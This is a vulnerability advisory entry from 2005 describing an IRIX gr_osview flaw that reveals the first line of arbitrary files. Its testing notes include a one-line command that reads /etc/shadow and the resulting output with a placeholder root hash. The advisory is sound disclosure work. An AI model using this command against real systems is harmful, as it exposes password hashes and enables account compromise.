IRIX gr_osview -D Parameter Arbitrary File Segment Disclosure

2005-02-18T00:00:00
ID OSVDB:15351
Type osvdb
Reporter iDEFENSE(idlabs-advisories@idefense.com)
Modified 2005-02-18T00:00:00

Description

Vulnerability Description

IRIX contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when permissions are not correctly verified when opening description files using gr_osview, which will disclose the first line of arbitrary files via the "-d" and "-D" options, resulting in a loss of confidentiality.

Solution Description

Currently, there are no known workarounds or upgrades to correct this issue. However, IRIX has released patches to address this vulnerability.

Short Description

IRIX contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when permissions are not correctly verified when opening description files using gr_osview, which will disclose the first line of arbitrary files via the "-d" and "-D" options, resulting in a loss of confidentiality.

Manual Testing Notes

user@irix$ gr_osview -d -D /etc/shadow sgets: waiting for string *SR> read <root:PASSWDHASHHERE:2051::::::> gr_osview: description file format error on line 1

References:

Vendor Specific Advisory URL Security Tracker: 1013662 Secunia Advisory ID:14875 Related OSVDB ID: 15350 Other Advisory URL: http://www.idefense.com/application/poi/display?id=226&type=vulnerabilities Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2005-04/0101.html CVE-2005-0464